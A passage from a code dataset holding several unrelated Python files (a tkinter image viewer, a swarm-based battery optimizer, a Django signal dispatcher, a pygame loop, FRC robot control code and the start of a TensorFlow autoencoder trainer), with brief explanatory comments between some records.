15:\n self.toolbar.widget_button_zoom_in.configure(state=\"disabled\")\n else:\n self.toolbar.widget_button_zoom_in.configure(state=\"enabled\")\n\n if 
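The chessboard painter above alternates colours by toggling a variable per cell and per row; the same pattern falls out of a parity test with no toggle bookkeeping (rows, cols and the canvas are assumed from context):

for row in range(rows):
    for col in range(cols):
        colour = 'white' if (row + col) % 2 == 0 else 'light grey'
        canvas.create_rectangle(col * 16, row * 16, col * 16 + 16, row * 16 + 16,
                                fill=colour, outline=colour)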
self.zoom_current < 2:\n self.toolbar.widget_button_zoom_out.configure(state=\"disabled\")\n else:\n self.toolbar.widget_button_zoom_out.configure(state=\"enabled\")\n\n def check_tile_buttons(self):\n if self.toolbar.variable_tile.get():\n self.toolbar.widget_button_tile_sides.configure(state=\"normal\")\n self.toolbar.widget_button_tile_corners.configure(state=\"normal\")\n\n elif not self.toolbar.variable_tile.get():\n self.toolbar.widget_button_tile_sides.configure(state=\"disabled\")\n self.toolbar.widget_button_tile_corners.configure(state=\"disabled\")\n\n self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", image=self.image_photo, tags=\"image\")\n self.widget_canvas_image.configure(width=self.image_photo.width(), height=self.image_photo.height())\n\n def draw_tiles(self):\n for item in [\"image\", \"image_top\", \"image_bottom\", \"image_left\", \"image_right\", \"image_top_left\", \"image_top_right\", \"image_bottom_left\", \"image_bottom_right\"]:\n self.widget_canvas_image.delete(item)\n\n self.widget_canvas_image.create_image(self.image_photo.width(), self.image_photo.height(), anchor=\"nw\", image=self.image_photo, tags=\"image\")\n\n if self.toolbar.variable_tile_sides.get():\n # self.widget_canvas_image.move(\"image\", self.image_photo.width(), self.image_photo.height())\n\n self.widget_canvas_image.create_image(self.image_photo.width(), 0, anchor=\"nw\", image=self.image_photo, tags=\"image_top\")\n self.widget_canvas_image.create_image(self.image_photo.width(), self.image_photo.height() * 2, anchor=\"nw\", image=self.image_photo, tags=\"image_bottom\")\n self.widget_canvas_image.create_image(0, self.image_photo.height(), anchor=\"nw\", image=self.image_photo, tags=\"image_left\")\n self.widget_canvas_image.create_image(self.image_photo.width() * 2, self.image_photo.height(), anchor=\"nw\", image=self.image_photo, tags=\"image_right\")\n\n if self.toolbar.variable_tile_corners.get():\n self.widget_canvas_image.create_image(0, 0, anchor=\"nw\", image=self.image_photo, tags=\"image_top_left\")\n self.widget_canvas_image.create_image(self.image_photo.width() * 2, 0, anchor=\"nw\", image=self.image_photo, tags=\"image_top_right\")\n self.widget_canvas_image.create_image(0, self.image_photo.height() * 2, anchor=\"nw\", image=self.image_photo, tags=\"image_bottom_left\")\n self.widget_canvas_image.create_image(self.image_photo.width() * 2, self.image_photo.height() * 2, anchor=\"nw\", image=self.image_photo, tags=\"image_bottom_right\")\n\n self.widget_canvas_image.configure(width=self.image_photo.width() * 3, height=self.image_photo.height() * 3)\n\n def on_enter(self, event):\n self.widget_frame_image.bind_all(\"\", self.on_scroll_vertical)\n self.widget_frame_image.bind_all(\"\", self.on_scroll_horizontal)\n\n del event\n\n def on_leave(self, event):\n self.widget_frame_image.unbind_all(\"\")\n self.widget_frame_image.unbind_all(\"\")\n\n del event\n\n def on_scroll_vertical(self, event):\n self.widget_canvas_image.yview_scroll(int(-1 * (event.delta / 120)), \"units\")\n\n def on_scroll_horizontal(self, event):\n self.widget_canvas_image.xview_scroll(int(-1 * (event.delta / 120)), \"units\")\n\n\nclass Menu(tk.Menu):\n def __init__(self, parent, *args, **kwargs):\n tk.Menu.__init__(self, parent, type=\"menubar\", *args, **kwargs)\n self.option_add('*tearOff', False)\n self.parent = parent\n\n\nclass Toolbar(ttk.Frame):\n def __init__(self, parent, **kwargs):\n ttk.Frame.__init__(self, parent, **kwargs)\n self.parent = parent\n\n # TODO: Change this to a pk.Toolbar.\n\n 
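draw_tiles above pins up to nine copies of the image to a 3x3 grid: centre, four sides, four corners. The hard-coded coordinates are just the grid products, which a comprehension makes explicit (w and h are the zoomed photo dimensions):

w, h = image_photo.width(), image_photo.height()
offsets = [(col * w, row * h) for row in range(3) for col in range(3)]
# offsets[4] == (w, h) is the centre tile; side tiles share one coordinate
# with it, corner tiles share none.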
image = load_images.LoadImages()\n self.image_chessboard = image.image_chessboard\n self.image_grid = image.image_grid\n self.image_zoom_in = image.image_zoom_in\n self.image_zoom_out = image.image_zoom_out\n\n self.variable_chessboard = tk.BooleanVar()\n self.variable_chessboard.set(True)\n self.widget_check_chessboard = ttk.Checkbutton(self, text=\"Chessboard\", image=self.image_chessboard,\n variable=self.variable_chessboard,\n command=self.parent.draw_background, style=\"Toolbutton\")\n self.widget_check_chessboard.grid(row=0, column=0)\n\n self.variable_grid = tk.BooleanVar()\n self.variable_grid.set(False)\n self.widget_check_grid = ttk.Checkbutton(self, text=\"Grid\", image=self.image_grid, variable=self.variable_grid,\n command=self.parent.draw_background, style=\"Toolbutton\")\n self.widget_check_grid.grid(row=0, column=1)\n\n ttk.Separator(self, orient=\"vertical\").grid(row=0, column=2, sticky=\"ns\")\n\n self.widget_button_zoom_in = ttk.Button(self, text=\"Zoom In\", image=self.image_zoom_in,\n command=self.parent.zoom_in, style=\"Toolbutton\")\n self.widget_button_zoom_in.grid(row=0, column=3)\n\n self.widget_button_zoom_out = ttk.Button(self, text=\"Zoom Out\", image=self.image_zoom_out,\n command=self.parent.zoom_out, style=\"Toolbutton\")\n self.widget_button_zoom_out.grid(row=0, column=4)\n idlelib.ToolTip.ToolTip(self.widget_button_zoom_out, \"Zoom the image out\")\n\n ttk.Separator(self, orient=\"vertical\").grid(row=0, column=5, sticky=\"ns\")\n\n self.variable_tile = tk.BooleanVar()\n self.widget_button_tile = ttk.Checkbutton(self, text=\"Tile\", variable=self.variable_tile,\n command=self.parent.check_tile_buttons, style=\"Toolbutton\")\n self.widget_button_tile.grid(row=0, column=6)\n\n self.variable_tile_sides = tk.BooleanVar()\n self.widget_button_tile_sides = ttk.Checkbutton(self, text=\"Tile Side\", variable=self.variable_tile_sides, command=self.parent.draw_tiles, style=\"Toolbutton\")\n self.widget_button_tile_sides.grid(row=0, column=7)\n\n self.variable_tile_corners = tk.BooleanVar()\n self.widget_button_tile_corners = ttk.Checkbutton(self, text=\"Tile Corners\", variable=self.variable_tile_corners, command=self.parent.draw_tiles, style=\"Toolbutton\")\n self.widget_button_tile_corners.grid(row=0, column=8)\n\n\nclass Statusbar(pk.Statusbar):\n def __init__(self, parent, *args):\n pk.Statusbar.__init__(self, parent, *args)\n\n self.status_variable = tk.StringVar()\n self.add_variable(variable=self.status_variable)\n\n self.bind_widget(parent.toolbar.widget_check_chessboard, self.status_variable, \"Show or hide the chessboard\",\n \"\")\n self.bind_widget(parent.toolbar.widget_check_grid, self.status_variable, \"Show or hide the grid\", \"\")\n\n self.bind_widget(parent.toolbar.widget_button_zoom_in, self.status_variable, \"Zoom the image in\", \"\")\n self.bind_widget(parent.toolbar.widget_button_zoom_out, self.status_variable, \"Zoom the image out\", \"\")\n\n self.add_sizegrip()\n\n\ndef main():\n app = tk.Tk()\n image_viewer = ImageViewer(app)\n image_viewer.load_image(\"./test_files/cobblestone.png\")\n # image_viewer.load_image(\"./icons/nbt.png\")\n app.mainloop()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"image_viewer.py","file_name":"image_viewer.py","file_ext":"py","file_size_in_byte":15633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"489663456","text":"import pyswarm as ps\nimport numpy as np\nfrom models.optimizer import *\nimport features.costFunctionStrategies as 
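The Toolbar above pairs each ttk.Checkbutton with a tk.BooleanVar so the rest of the viewer can poll toggle state; the pattern in a minimal, self-contained form:

import tkinter as tk
from tkinter import ttk

root = tk.Tk()
show_grid = tk.BooleanVar(value=False)
ttk.Checkbutton(root, text='Grid', variable=show_grid,
                command=lambda: print('grid on' if show_grid.get() else 'grid off')
                ).pack()
root.mainloop()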
strategy\n\nclass ModelThreePSOOptimizer(Optimizer):\n\n def __init__(self, ids, dateTime, loadGrid, loadCons, loadProd):\n super().__init__(ids, dateTime, loadGrid, loadCons, loadProd)\n # self.lb = [0] * len(self.loadCons)\n # self.ub = [0.01] + [self.batteryCapacity] * (len(self.loadCons) - 1)\n # self.fopt = 0\n self.lb = np.array([])\n self.ub = np.array([])\n self.newGrid = np.array([])\n self.prodUsage = np.array([])\n self.battCharge = np.array([])\n self.prices = np.array(self.prices)\n \n def optimize(self):\n\n numberOfDays = int (len(self.dateTime) / 24)\n oneDayLb = 0\n oneDayUb = 0\n oneDayNewGrid = 0\n oneDayProdUsage = 0\n oneDayBattCharge = 0\n\n for idx, (oneDayLoadCons, oneDayLoadProd, oneDayPrices) in enumerate(zip(np.split(self.loadCons, numberOfDays), np.split(self.loadProd, numberOfDays), np.split(self.prices, numberOfDays))):\n \n oneDayLb = [0] * 24\n if idx is 0:\n oneDayUb = [0.01] + [self.batteryCapacity] * 23\n else:\n oneDayUb = [0.01 if self.battCharge[-1] <= 0 else self.battCharge[-1]] + [self.batteryCapacity] * 23\n\n\n oneDayBattCharge, fopt = ps.pso(strategy.costFuncOnMinPrice,\n oneDayLb,\n oneDayUb,\n args=(oneDayLoadCons, oneDayLoadProd, oneDayPrices),\n debug=False,\n swarmsize=20,\n maxiter=100000)\n \n oneDayNewGrid = strategy.newGridEvolution(oneDayBattCharge, oneDayLoadCons, oneDayLoadProd)\n oneDayProdUsage = strategy.costEvolutionProduction(oneDayBattCharge, oneDayLoadCons, oneDayLoadProd)\n\n self.lb = np.append(self.lb, oneDayLb)\n self.ub = np.append(self.ub, oneDayUb)\n self.newGrid = np.append(self.newGrid, oneDayNewGrid)\n self.prodUsage = np.append(self.prodUsage, oneDayProdUsage)\n self.battCharge = np.append(self.battCharge, oneDayBattCharge) \n \n def getReport(self):\n updateDict = super().getReport()\n updateDict.update({ \"lb\": self.lb,\n \"ub\": self.ub,\n # \"fopt\": self.fopt\n })\n return updateDict","sub_path":"src/models/modelThreePSOOptimizer.py","file_name":"modelThreePSOOptimizer.py","file_ext":"py","file_size_in_byte":2593,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"591251497","text":"#-*- coding: utf-8 -*-\n\nfrom django.dispatch import Signal\n\n\n__all__ = ['hook', ]\n\n\nclass Hook(object):\n \"\"\"\n A dynamic-signal dispatcher.\n\n thread-safety: it's not thread safe, this may change\n in the future if a RLock is added around _registry operations.\n In the meanwhile, you should register/connect/disconnect\n at import time (global scope) to ensure thread-safety,\n models.py and urls.py are good places (django<=1.6)\n or do it in the AppConfig.ready() method (django>=1.7).\n \"\"\"\n def __init__(self):\n self._registry = {}\n\n def register(self, name):\n \"\"\"\n Registers a new hook. Not required (see connect method).\n\n @name: the hook name.\n \"\"\"\n signal = Signal(providing_args=['args', 'kwargs'])\n self._registry[name] = signal\n return signal\n\n def connect(self, name, func, sender=None, dispatch_uid=None):\n \"\"\"\n Connects a function to a hook. Creates the hook-name if it does not exists.\n\n @name: the hook name.\n @func: a function reference, must return a string.\n @sender: optional sender __class__ to which this func should respond. 
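Two notes on the optimizer record above. The test `if idx is 0` only works because CPython caches small integers (and it raises a SyntaxWarning from Python 3.8 on); the correct spelling is `idx == 0`. And the day-splitting depends on np.split producing equal 24-hour chunks, which requires the input arrays to cover whole days:

import numpy as np

prices = np.arange(48.0)                       # two days of hourly prices
per_day = np.split(prices, len(prices) // 24)  # raises if not evenly divisible
assert all(day.size == 24 for day in per_day)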
Default will match all.\n @dispatch_uid: optional unique id, see django Signals for more info.\n \"\"\"\n try:\n signal = self._registry[name]\n except KeyError:\n signal = self.register(name)\n\n signal.connect(func, sender=sender, dispatch_uid=dispatch_uid)\n\n def disconnect(self, name, func, dispatch_uid=None):\n \"\"\"\n Disconnects a function from a hook.\n\n @name: the hook name.\n @func: a function reference.\n @dispatch_uid: optional unique id, see django Signals for more info.\n \"\"\"\n try:\n signal = self._registry[name]\n except KeyError:\n return\n\n signal.disconnect(func, dispatch_uid=dispatch_uid)\n\n def send(self, name, sender=None, **kwargs):\n \"\"\"\n Sends the signal. Returns every function response\n that was hooked to hook-name as a list: [(func, response), ].\n\n @name: the hook name.\n @sender: optional sender __class__, see connect method.\n \"\"\"\n try:\n signal = self._registry[name]\n except KeyError:\n return []\n\n return signal.send(sender=sender, **kwargs)\n\nhook = Hook()","sub_path":"hooks/signalhook.py","file_name":"signalhook.py","file_ext":"py","file_size_in_byte":2370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"70175521","text":"import pygame\n\npygame.init()\n\ndisplay = pygame.display.set_mode((640, 480))\npygame.display.set_caption(\"My Game Window\")\nclock = pygame.time.Clock()\n\ncrash = False\n\nwhile not crash:\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n crash = True\n\n print(event)\n\n pygame.display.update()\n clock.tick(60)\n\npygame.quit()\nquit()\n","sub_path":"PyGame/PyGame01.py","file_name":"PyGame01.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"215440201","text":"#Librerias necesarias para el uso de todo el codigo\n\n# from networktables import NetworkTables\nimport wpilib\nfrom wpilib.drive import MecanumDrive\nfrom state import state\nimport oi\nimport time\n\n\nclass MyRobot(wpilib.TimedRobot):\n\n\tdef robotInit(self):\n\n\t\t# NetworkTables.initialize()\n\t\t# self.sd = NetworkTables.getTable('SmartDashboard')\n\t\twpilib.CameraServer.launch()\n\n\t\t# Inicializadores_de_PCM (en caso de que no arranque el PCM)\n\n\t\t# self.Compressor.setClosedLoopControl(True)\n\t\t# self.enabled = self.Compressor.enabled()\n\n\t\t#Solenoides y Compresores\n\t\t\n\t\tself.Compressor = wpilib.Compressor(0)\n\t\tself.PSV = self.Compressor.getPressureSwitchValue()\n\t\tself.piston = wpilib.Solenoid(0,0)\n\t\tself.impulsor_frontal = wpilib.DoubleSolenoid(0,2,3)\n\t\tself.impulsor_trasero = wpilib.DoubleSolenoid(0,4,5)\n\n\t\t# Encoders y otros Sensores\n\t\t\n\t\tself.encoder = wpilib.Encoder(8, 7)\n\n\t\tself.left_sensor = wpilib.DigitalInput(0)\n\t\tself.principal_sensor = wpilib.DigitalInput(1)\n\t\tself.right_sensor = wpilib.DigitalInput(2)\n\n\t\tself.ultrasonic= wpilib.Ultrasonic(3,4)\n\n\t\tself.prueba_sensor = wpilib.DigitalInput(5)\n\n\n\n\t\tself.P = 0.2\n\t\tself.I = 0\n\t\tself.D = 0\n\n\t\tself.integral = 0\n\t\tself.previous_error = 0\n\n\t\t# Contador y Control\n\n\t\tself.timer = wpilib.Timer()\n\n\t\t# Motores del Chasis\n\n\t\tself.front_left_motor = wpilib.Talon(0)\n\t\tself.rear_left_motor = wpilib.Talon(1)\n\t\tself.front_right_motor = wpilib.Talon(2)\n\t\tself.rear_right_motor = wpilib.Talon(3)\n\n\t\t\n\n\t\t#lift and claw motors\n\n\t\tself.lift_motor = wpilib.Talon(4)\n\t\tself.lift_motor_2 = wpilib.Talon(5)\n\n\n\n\t\t#Union de los 
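The signal-hook record above defines the dispatcher but shows no call site; a short usage sketch against its own API (the handler name is invented for illustration). Note that Signal(providing_args=...) was deprecated and later removed in newer Django releases, so register() may need adjusting there:

from hooks.signalhook import hook

def on_article_saved(sender, **kwargs):
    return 'indexed'

hook.connect('article-saved', on_article_saved)
responses = hook.send('article-saved', sender=None)  # [(receiver, 'indexed')]
hook.disconnect('article-saved', on_article_saved)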
motores para su funcionamiento\n\t\t# en conjunto de mecaunm\n\n\t\tself.drive = MecanumDrive(\n\t\t\tself.front_left_motor,\n\t\t\tself.rear_left_motor,\n\t\t\tself.front_right_motor,\n\t\t\tself.rear_right_motor)\n\n\t\t#Motor impulsor \n\n\t\tself.motor_impulsor = wpilib.Talon(6)\n\n\n\t\t\n\tdef autonomousInit(self):\n\n\t\tself.timer.reset()\n\t\tself.timer.start()\n\t\tstate[\"timer_piston\"] = 0\n\t\t\n\tdef autonomousPeriodic(self):\n\n\t\tif self.timer.get() < .8:\n\t\t\tself.drive.driveCartesian(0,-0.9,0,0)\n\t\t\tprint (\"salto de la plataforma hacia atrás\")\n\t\telif self.timer.get() < 3:\n\t\t\tself.drive.driveCartesian(0,-0.1,0,0)\n\t\t\tprint (\"avanza un poco más, en reversa\")\n\t\telif self.timer.get() < 4.35:\n\t\t\tself.drive.driveCartesian(0,0,-0.4,0)\n\t\t\tprint (\"gira en su propio eje derecha/izquierda?\")\n\t\telif self.timer.get() < 6:\n\t\t\tself.timer.stop()\n\t\t\t# while self.prueba_sensor.get():\n\t\t\twhile self.ultrasonic.getRangeMM() < 20 and self.ultrasonic.getRangeMM() > 0:\n\t\t\t\tprint (\"en modo de infrarrojos\")\n\t\t\t\tif self.principal_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(0, 0, 0, 0)\n\t\t\t\t\tself.timer.start()\n\t\t\t\t\tbreak\n\n\t\t\t\telif self.left_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(0.2, 0, 0, 0)\n\t\t\t\telif self.right_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(-0.2, 0 ,0, 0)\n\t\t\t\telse:\n\t\t\t\t\tself.drive.driveCartesian(0, -0.2, 0, 0)\n\n\t\t\telse:\n\t\t\t\tself.drive.driveCartesian(0,0.3,0,0)\n\t\t\t\tprint (\"avanza hacia adelante hasta ultra detect\")\n\t\n\t\telif self.timer.get() < 6.5:\n\t\t\tself.piston.set(True)\n\t\t\tprint (\"psss lanzar\")\n\n\t\telif self.timer.get() < 7:\n\t\t\tself.piston.set(False)\n\t\t\tprint (\"psss retraer\")\n\n\n\t\telse:\n\t\t\tprint (\"autonomo terminado\")\n\t\t\tself.drive.driveCartesian(0,0,0,0)\n\t\t\n\n\n\n\n\n\tdef teleopPeriodic(self):\n\n\t\t#se leen constantemente los botones,joysticks y cambia de modalidades de controles\n\n\t\toi.read_control_inputs(state[\"Controller\"])\n\t\tself.PID()\n\t\tself.timer.start()\n\n\t\t# Funcion del Encoder\n\n\t\tdef Encoder(setpoint):\n\n\t\t\tstate[\"setpoint\"] = setpoint\n\n\t\t\tif self.rcw >= 660:\n\t\t\t\tstate[\"lift_motor\"] = 0.5\n\t\t\telif self.rcw <= 660 and self.rcw >= 460:\n\t\t\t\tstate[\"lift_motor\"] = 0.45\n\t\t\telif self.rcw <= 460 and self.rcw >= 300:\n\t\t\t\tstate[\"lift_motor\"] = 0.4\n\t\t\telif self.rcw <= 300 and self.rcw >= 200:\n\t\t\t\tstate[\"lift_motor\"] = 0.35\n\t\t\telif self.rcw <= 200 and self.rcw >= 102:\n\t\t\t\tstate[\"lift_motor\"] = 0.3\n\t\t\telif self.rcw <= 102.00:\n\t\t\t\tstate[\"lift_motor\"] = 0\n\n\n\t\tif state[\"codewide_breaker\"] == False:\t\n\n\t\t\t# Movimiento manual de las mecanum, align y turbo\n\n\t\t\tx = state[\"mov_x\"] \n\t\t\ty = state[\"mov_y\"] \n\t\t\tz = state[\"mov_z\"] \n\n\t\t\tpowerX = 0 if x < 0.10 and x > -0.10 else x\n\t\t\tpowerY = 0 if y < 0.10 and y > -0.10 else y\n\t\t\tpowerZ = 0 if z < 0.10 and z > -0.10 else z\n\t\t\n\n\t\t\tif state[\"align_activated\"]:\n\n\t\t\t\tif self.principal_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(0, 0, 0, 0)\n\t\t\t\telif self.left_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(0.2, 0, 0, 0)\n\t\t\t\telif self.right_sensor.get():\n\t\t\t\t\tself.drive.driveCartesian(-0.2, 0 ,0, 0)\n\t\t\t\telse:\n\t\t\t\t\tself.drive.driveCartesian(0, -0.2, 0, 0)\n\n\n\t\t\telif state[\"turbo_activated\"]:\n\n\t\t\t\tself.drive.driveCartesian(powerX ,-powerY , powerZ, 
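The three-sensor line follow in the robot record appears twice, once in autonomousPeriodic and again in the teleop align mode; factoring the decision into one pure function would keep the copies from drifting apart (a hedged refactor mirroring the record's constants, not the team's code):

def align_command(left, centre, right):
    # Returns (x, y) for driveCartesian: stop on the line, strafe toward it,
    # or creep backwards until a sensor sees it.
    if centre:
        return (0.0, 0.0)
    if left:
        return (0.2, 0.0)
    if right:
        return (-0.2, 0.0)
    return (0.0, -0.2)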
0)\n\n\t\t\telse:\n\t\t\t\tself.drive.driveCartesian(powerX * 0.6,-powerY * 0.6, powerZ * 0.5, 0)\n\n\n\t\t\t# Configuracion para el elevador automaticamente\n\n\t\t\t# Hatch panel medio y piston\n\t\t\t\n\n\t\t\tif state[\"position\"] == \"media\" and state[\"mechanism\"] == \"piston\":\n\t\t\t\tstate[\"timer_lift_middle\"] += 1\n\t\t\t\tif state[\"timer_lift_middle\"] < 240:\n\t\t\t\t\tEncoder(1621) \n\t\t\t\telif state[\"timer_lift_middle\"] < 275:\n\t\t\t\t\tstate[\"piston_activated\"] = True\n\t\t\t\telif state[\"timer_lift_middle\"] < 310:\n\t\t\t\t\tstate[\"piston_activated\"] = False\n\t\t\t\telif state[\"timer_lift_middle\"] < 510:\n\t\t\t\t\tstate[\"lift_motor\"] = -0.5\n\t\t\t\telse:\n\t\t\t\t\tstate[\"timer_lift_middle\"] = 0\n\t\t\t\t\tstate[\"position\"] = \"neutral\"\n\t\t\t\t\tstate[\"mechanism\"] = \"neutral\"\n\n\t\t\tif state[\"position\"] == \"high\" and state[\"mechanism\"] == \"piston\":\n\t\t\t\tstate[\"timer_lift_taller\"] += 1\n\t\t\t\tif state[\"timer_lift_taller\"] < 240:\n\t\t\t\t\tEncoder(1621) \n\t\t\t\telif state[\"timer_lift_taller\"] < 275:\n\t\t\t\t\tstate[\"piston_activated\"] = True\n\t\t\t\telif state[\"timer_lift_taller\"] < 310:\n\t\t\t\t\tstate[\"piston_activated\"] = False\n\t\t\t\telif state[\"timer_lift_taller\"] < 510:\n\t\t\t\t\tstate[\"lift_motor\"] = -0.5\n\t\t\t\telse:\n\t\t\t\t\tstate[\"timer_lift_taller\"] = 0\n\t\t\t\t\tstate[\"position\"] = \"neutral\"\n\t\t\t\t\tstate[\"mechanism\"] = \"neutral\"\n\n\t\t\t# Configuracion para mover el elevador y la claw manualmente \n\n\n\t\t\tself.lift_motor.set(state[\"lift_motor\"])\n\t\t\tself.lift_motor_2.set(state[\"lift_motor\"])\n\n\n\t\t\t# Pistons (manual) and Compressors (automatico)\n\n\n\t\t\tself.piston.set(state[\"piston_activated\"])\n\n\t\t\tif self.PSV:\n\t\t\t\tself.Compressor.stop()\n\t\t\telse:\n\t\t\t\tself.Compressor.start()\n\n\t\t\t# Immpulsor (Manual y automaticamente)\n\n\t\t\tself.impulsor_frontal.set(state[\"impulsor_situation_front\"])\n\t\t\tself.impulsor_trasero.set(state[\"impulsor_situation_trasero\"])\n\t\t\tself.motor_impulsor.set(state[\"impulsor_motor\"])\n\n\n\t\t\tif state[\"impulsor_on\"] or state[\"timer_impulsor\"] != 0:\n\t\t\t\tstate[\"timer_impulsor\"] += 1\n\t\t\t\n\t\t\t\tif state[\"timer_impulsor\"] < 150:\n\t\t\t\t\tstate[\"impulsor_situation_front\"] = 1\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 1\n\t\t\t\telif state[\"timer_impulsor\"] < 180:\n\t\t\t\t\tstate[\"impulsor_situation_front\"] = 0\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 0\n\t\t\t\telif state[\"timer_impulsor\"] < 250:\n\t\t\t\t\tstate[\"impulsor_motor\"] = 1\n\t\t\t\telif state[\"timer_impulsor\"] < 400:\n\t\t\t\t\tstate[\"impulsor_situation_front\"] = 2\n\t\t\t\t\tstate[\"impulsor_motor\"] = 1\n\t\t\t\t\tself.drive.driveCartesian(0,0.4,0,0)\n\t\t\t\telif state[\"timer_impulsor\"] < 600:\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 2\n\t\t\t\t\tstate[\"impulsor_motor\"] = 0\n\t\t\t\telif state[\"timer_impulsor\"] < 700:\n\t\t\t\t\tself.drive.driveCartesian(0,0.6,0,0)\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 0\n\t\t\t\telse:\n\t\t\t\t\tstate[\"timer_impulsor\"] = 0\n\t\t\t\t\tstate[\"impulsor_situation_front\"] = 0\n\t\t\t\t\tstate[\"impulsor_situation_trasero\"] = 0\n\t\t\t\t\tstate[\"impulsor_motor\"] = 
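The joystick deadband above is spelled out once per axis (`0 if x < 0.10 and x > -0.10 else x`); the usual helper form reads:

def deadband(value, threshold=0.10):
    # Zero out stick noise around centre, pass everything else through.
    return 0.0 if -threshold < value < threshold else value

power_x = deadband(state['mov_x'])
power_y = deadband(state['mov_y'])
power_z = deadband(state['mov_z'])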
0\n\t\t\t\t\tself.drive.driveCartesian(0,0,0,0)\n\t\t\telse:\n\t\t\t\tpass\n\n\t\telse:\n\t\t\tself.drive.driveCartesian(0,0,0,0)\n\t\t\tself.impulsor_frontal.set(0)\n\t\t\tself.impulsor_trasero.set(0)\n\t\t\tself.motor_impulsor.set(0)\n\t\t\tself.piston.set(False)\n\t\t\tself.lift_motor.set(0)\n\t\t\tself.lift_motor_2.set(0)\n\n\t\t\tstate[\"impulsor_trasero\"] = 0\n\t\t\tstate[\"impulsor_frontal\"] = 0\n\t\t\tstate[\"impulsor_situation_trasero\"] = 0\n\t\t\tstate[\"impulsor_situation_front\"] = 0\n\t\t\tstate[\"impulsor_motor\"] = 0\n\t\t\tstate[\"piston_activated\"] = False\n\t\t\tstate[\"lift_motor\"] = 0\n\t\t\tstate[\"position\"] = \"neutral\"\n\t\t\tstate[\"mechanism\"] = \"neutral\"\n\t\t\tstate[\"timer_piston\"] = 0\n\t\t\tstate[\"timer_impulsor\"] = 0\n\t\t\tstate[\"timer_lift_taller\"] = 0\n\t\t\tstate[\"timer_lift_middle\"] = 0\n\t\t\tstate[\"align_activated\"] = False\n\t\t\tstate[\"turbo_activated\"] = False\n\t\t\n\n\n\tdef PID (self):\n\n\t\terror = state[\"setpoint\"] - 400#self.encoder.get()\n\t\tself.integral = self.integral + (error*.02)\n\t\tderivative = (error - self.previous_error) / .02\n\t\tself.rcw = self.P*error + self.I*self.integral + self.D*derivative\n\t\t# print (self.rcw)\n\n\n#funcion para correr el codigo del robot utlizando\n# este archivo como el principal\n\nif __name__ == '__main__':\n\twpilib.run(MyRobot)\n","sub_path":"robot.py","file_name":"robot.py","file_ext":"py","file_size_in_byte":8606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"553731238","text":"import numpy as np\nimport tensorflow as tf\nimport os\nfrom utils import *\nfrom layers import *\nfrom param import param\nfrom tqdm import tqdm\nfrom AEN import AdversarialAutoEncoder\nfrom distribution import diagonal_gaussian, gaussian_mixture\n\n\ndef latent_generator(dist, z_dim, batch_size):\n with tf.variable_scope('generator'):\n if dist == 'gaussian':\n z = diagonal_gaussian(batch_size, n_dim=z_dim)\n elif dist == 'gmm':\n z = gaussian_mixture(batch_size, n_dim=z_dim, n_labels=10, x_var=0.5, y_var=0.1, label_indices=None)\n else:\n raise NotImplementedError\n return z\n\n\nclass Trainer(AdversarialAutoEncoder):\n def __init__(self, train_data, train_size, hps, sess, model):\n super(Trainer, self).__init__(train_data, train_size, hps, sess)\n self.model = model\n self.global_step = 0\n self.lr = self.param.lr\n\n def learn(self):\n self.model.draw_graph()\n self.optimizer = tf.train.AdamOptimizer(learning_rate=self.model.lr, beta1=0.5)\n self.opt_r, self.opt_d, self.opt_g = self.model.get_aen_d_g_training_op(self.optimizer)\n self.summary = self.model.get_train_summary()\n\n self.sess.run(tf.global_variables_initializer())\n\n num_batch_per_epoch = int(self.data_size / self.param.batch_size)\n iterator = tf.data.Iterator.from_structure(output_types=self.dataset.output_types,\n output_shapes=self.dataset.output_shapes)\n iterator_init_op = iterator.make_initializer(self.dataset)\n img, label = iterator.get_next()\n\n self.summary_writer = tf.summary.FileWriter(os.path.join(self.param.log_path, self.param.run_name) + '/',\n self.sess.graph)\n self.saver = tf.train.Saver()\n\n with tf.variable_scope('learning'):\n for epoch in tqdm(range(self.param.epoch)):\n self.sess.run(iterator_init_op)\n if epoch == (100 - 1) or epoch == (300 - 1):\n self.lr /= 10\n\n for iter in range(num_batch_per_epoch):\n batch_img, batch_label = self.sess.run([img, label])\n\n prior_latent = latent_generator(self.param.dist, self.param.z_dim, 
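The PID method at the end of the robot record hard-codes the measurement to 400 (the self.encoder.get() read is commented out) and never writes self.previous_error back, so the derivative term always differences against the stale initial value. A self-contained corrected step under the record's own 20 ms loop assumption:

def pid_step(setpoint, measurement, st, kp=0.2, ki=0.0, kd=0.0, dt=0.02):
    error = setpoint - measurement
    st['integral'] += error * dt
    derivative = (error - st['previous_error']) / dt
    st['previous_error'] = error   # the record never updates this
    return kp * error + ki * st['integral'] + kd * derivative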
